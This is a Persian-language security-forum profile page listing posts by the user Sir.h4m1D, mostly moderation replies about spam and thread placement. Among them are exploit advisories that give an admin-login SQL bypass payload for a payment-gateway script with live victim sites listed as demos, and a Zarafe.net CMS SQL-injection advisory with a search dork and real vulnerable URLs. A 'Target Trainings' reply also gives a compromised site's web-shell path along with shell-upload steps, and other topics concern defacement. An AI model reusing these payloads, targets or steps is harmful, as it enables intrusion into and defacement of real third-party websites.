با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
514 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1 -
Country
ایران
نوع محتوا
نمایه ها
تالارهای گفتگو
تقویم
Articles
بخش دریافت
تمامی مطالب نوشته شده توسط Sir.h4m1D
-
Wordpress Gravity Forms Plugin Exploit And File Upload
davala پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در Web Application Exploits
سلام خسته نباشید 1 - این بخش برای کشفیات تیمی هستش https://iran-cyber.net/forums/threads/%D9%82%D9%88%D8%A7%D9%86%DB%8C%D9%86-%D8%A8%D8%AE%D8%B4-%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-%D8%AB%D8%A8%D8%AA-%D8%B4%D8%AF%D9%87.1550/ 2 - اینکه بهتره اکسپلویت رو قرار بدید و اگه زحمتی نیست آموزشش رو اینطور پست ها به اسپم بیشتر شبیه هستن تا مفید بودن ممنون ./ -
سلام خسته نباشید ممنون از پست خوبتون ولی اخرین امتحان خودتون چه زمانی بوده ؟ چون تست کردم و چیزی نشده ! شاید بنده اشتباه میرم راه پیشنهادیتون رو اگه ممکنه فیلمی تهیه کنید از موضوع ! امثال بنده زیادن دیگه ./
-
صفحه دیفیس زیبا جهت هک سایتای خارج از ایران
mehrabblackhat پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در آموزش تصویری رفع آسیب پذیری سایت و سرورها
سلام 1- تیم دیفیس برای خودشون صفحه دیفیس مربوط به سایت ( ایران سایبر ) دارند 2- لطفا مبحثی که میذارید دقت کنید که در کدام بخش میذارید ! 3- نظرات اینجا با فشار دادن دکمه تشکر نشون داده میشه که راضی هستند یا خیر 1 اخطار در یک پست رعایت کنید ، ممنون ./ -
آموزش کامل باگ Remote File Include
Sir.h4m1D پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در LFi , LFD , RFi
سلام لطفا از دکمه تشکر استفاده کنید و اسپم ندید ممنون ./ -
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در ابزارهای امنیتی و آنالیز سیستم ها
با سلام خدمت شما اول که جواب شما us pw : test و فقط sql نیست باگ این ساب xss و ... دوما اینجا جای تبلیغ دیگر گروه های امنیتی نیست و فعالیت در این تیم به معنای فعالیت به اسم ایران سایبر است سوما شما سه اخطار دریافت کردید لطفا رعایت کنید !- 1520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
آموزش باگ وردپرس V 4.7
BlackErroR پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در تحلیل و بررسی آسیب پذیری های سایت و سرورها
خسته نباشید عنوان عوض شد ! لطفا موارد اموزشی رو که با ویدیو ضبط کردین با ( اموزش ) شروع کنید ! کلمه دیفیس زیاد مناسب نیست ! ممنون از شما ./ -
سلام خسته نباشید ممنون از پستتون ولی فکرکنم رمز اشتباه هستش ! فایل یاهو رو زدم رمز متاسفانه اشتباه بود ./
-
خسته نباشید ممنون از فعالیتتون اگر میتونید پیوست کنید چون ماندگاری زیادی داره در اپلودسنتر ها متاسفانه بعد گذشت زمان دیلیت خواهد شد ممنون ./
-
تاپیک جامع ابزار های کرک Cracking Tools
F4LL3N پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در ابزار و مقالات کرک
سلام خسته نباشيد هر برنامه اي كه قرار ميدين با هر فرمت اجرايي لطفا لينك اسكن قرار بدين ممنون -
question مشکل باز نشدن 192.168.1.1
a-aj پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در بخش سوال و جواب های عمومی
اگه مودم رو ریست نکردین ( خاموش روشن ) انجام بدین درست میشه ولی اگه انجام دادین درست نشده بگین تا راهکار بگیم -
جوابی دریافت نمیکنید چون تاپیک برای یک الی دوساله پیشه در یک تاپیک اعلام کردین که لینک چنین اموزشی رو میخواید صبر کنید تا قرار داده بشه نه اینکه هی اسپم بدین ! قوانین انجمن رو رعایت کنید ./
-
آموزش ۲ نوع باگ شل و دف کردن
Ehsan KOoRn پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در آموزش و امنیت سایت و سرورهای ویندوز
سلام خب اگه شما یکم در انجمن سرچ میکردین اموزش fckeditor زیاد گذاشته شده ! شل در این نوع ادیتور اجرا نمیشه در ورژن جدید ( قدیمی امکانش وجود داشته و با یک بایپس انجام میشده ) ممنون میشم اول سرچ کنید و دوم اینکه اموزش رو سعی کنید اختصاصی بسازید ( به اسم تیمی دیگر نباشه ) و سوم اینکه لطفا از عنوان بهتر استفاده کنید و نوع حملات رو شرح بدین ./ -
پیدا کردن یوزرهای ۱ سرور
Ehsan KOoRn پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در آموزش و امنیت سایت و سرورهای ویندوز
سلام و خسته نباشید این اموزش از نظر بنده کامل اشتباهه و بقیه رو هم به اشتباه میندازه ! درسته که میتونید reverse ip بگیرید و سایت ها بیاد .... ولی همیشه این سایت درست نمیگه 70% و در بینگ درسته که شما زدین ip: x.,x,x,x, /public_html/ ! اگه یکم دقت کنید میبینید که این از چندتا باگ در سایت یوزر نشون میده ( sql و یا ... ) بهترین روش اینه که شما از یک سایت در سرور دسترسی بگیرید etc/passwd و named بگیرین ! خیلی ممنون ./ -
question آی دی افراد در تلگرام
ali88889 پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در بخش سوال و جواب های عمومی
سلام در مورد سوال شما باید عرض کنم که تلگرام آنقدر به خودش اعتماد داشته که بر روی مسنجر خود شرط بندی کرده ! که هرکس بتونه باگ یا اصلا همین نفوذ به سروری که میگین ( احتمالش واقعا خیلی کمه ) انجام بدن جایزه بزرگی مد نظر گرفته ! و تا الان هم باگه خاصی نبوده ! باز هم نمیشه گفت مسنجره قدرت مندی هستش ! -
Admin Bypass Scripts Payment Gateway
یک موضوع پاسخی ارسال کرد برای Sir.h4m1D در آسیب پذیری های کشف و گزارش شده
https://cxsecurity.com/issue/WLB-2016080111 http://irancybernews.org/en/ICNA/vuln/337/ ############################################################## # Exploit Title: Admin Bypass Scripts Payment Gateway ( دروازه پرداخت آنلاين طراحان وب ) # Date: 8/12/2016 # Exploit Author: Iran Cyber Security Group # Discovered By: sir.h4m1d # Vendor Homepage: iranwebhost.ir # Version: All version # Tested on: Windows ############################################################## [~] VULNERABILITY}~~ http://www.Site.com/pay/admin/ or /payment/admin/ [~] EXPLOIT: Username: '=' 'OR' Password: '=' 'OR' ############## [~] LIVE DEMO: # demo 1 : http://www.afpelevator.com/payment/admin/ # demo 2 : http://www.mahsan.net/pay/admin/ # demo 3 : http://www.iranwebhost.ir/pay/admin/ # demo 4 : https://bartarinpanlsms.net/pay/admin/ ###################################################################### # Contact mail: [email protected] # Offecial Website: http://iran-cyber.net # My Team : MOHAMAD-NOFOZI , root3r , sir.h4m1d , Promis , white.wolf , mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n , nazanin_wild , 0xdevil ############################################################################# -
security آموزش دیفیس و آپلود شل با آپلودر Fckeditor + دورک جدید
Mohammads411 پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام خدمت شما خسته نباشید در اول عرض کنم که این نوع باگ ها خیلی قدیمی هستند و اکثر 90% بسته شده اند و در ورژن های اولیه امکان اپلود شل بود که اون زمان هم خیلی کم شل میشد ! دوم عرض کنم که این تاپیک با موضوع all rfu در انجمن گذاشته شده با دورک و تمامی fck های موجود لطفا سرچ کنید http://www.iran-cyber.net/forums/threads/all-rfu-exploits.365/ ممنون ./ -
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در ابزارهای امنیتی و آنالیز سیستم ها
http://coplaste.com.br/admin/modulos/banner/img/alf.php http://coplaste.com.br/admin/login.php '=' 'OR' '=' 'OR' بایپس ادمین ( به پنل ادمین برین قسمت بنر شل خودتون رو اپلود کنید به هر فرمتی در صورت پاک شدن شل توضیح دادم )- 1520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در ابزارهای امنیتی و آنالیز سیستم ها
سلام خدمت davala عزيز مرسي از فعاليتي كه انجام ميدين ! لطفا تارگت هايي كه ميذارين رو داخل تگ قرار بدين كه هم بعضي كلمات به هم چسبيده تبديل به شكلك نشوند هم بي نظمي به وجود نياد ! ممنون از شما ./- 1520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
درخواست اموزش نفوذ با باگxss
mohammadsaeid پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در ( Cross Site Scripting ( Xss
سلام خدمت شما اين تاپيك قديمي هستش لطفا تاپيك هاي قديمي رو بالا نياريد احتمالا رمز : iran-cyber.in Or iran-cyber.org -
Zarafe.net Cms Sql Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای Sir.h4m1D در آسیب پذیری های کشف و گزارش شده
exploit Title : Zarafe.net CMS SQL Injection Vulnerability Exploit Author : Iran Cyber Security Group (ICSG) Discovered By : 0x3a Vendor HomePage : www.zarrafe.net Version : 1.0 (Q1) Date : 4 April, 2016 Tested On : Internet Explorer , Win 98 ----------------------------------------- SQL Injection : For Finding Target First You Must Search The Dork And Select Your Target Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت" Vulnerable Page : news.php , news_view.php , product.php Vulnerable Variable : news_id= Demo : novinsystemfars.ir/news_view.php?news_id=30' pezeshkian-pharmacy.ir/news.php?news_id=3' sdshiraz.com/news.php?news_id=8' omidoor.com/products.php?product_category_code=12-15' meysam71.ir/news.php?khabar_id=10' etehadweb.ir/view_single_news.php?news_id=2 [+][+][+][+][+][+][+] WWW.IRAN-CYBER.NET[+] [+][+][+][+][+][+][+] </0x3a> -
آموزش هک سایت باگ ( Ftp )
danger.boy پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام دوست عزیز لطفا فایل ها رو پیوست کنید ! ممنون ./ -
عزیزم شما جوابتون رو دریافت کردید دوباره چه سوالی هست که میپرسید ؟ ایشون مک ادرس چند سیستم یا موبایل شخصی رو ست کردن و خیال راحت باز گذاشتند بدون رمز حتی اگر مک ادرس چند سیستم رو ست کنید و رمز هم بذاره شما رمز رو بدست بیارید نمیتونید وارد اون وای فای بشید تا طرف مک شما رو اضافه نکنه نمیتونید استفاده کنید و تمام
-
Datalife Cms
Shadow_white پاسخی برای موضوع ارسال کرد برای یک Sir.h4m1D در Web Application Security Q/A
سلام خدمت شما دوست عزیز بله مدیریت محتوا دیتالایف باگ sql داره که توسط تیم کشف شده و هنوز ثبت نکردیم یعنی ( پرایوت ) هست البته باگ های پابلیک شده هم هستند که هنوز پتچ نشده اند تست کنید بازم شاید به کارتون بیاد
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.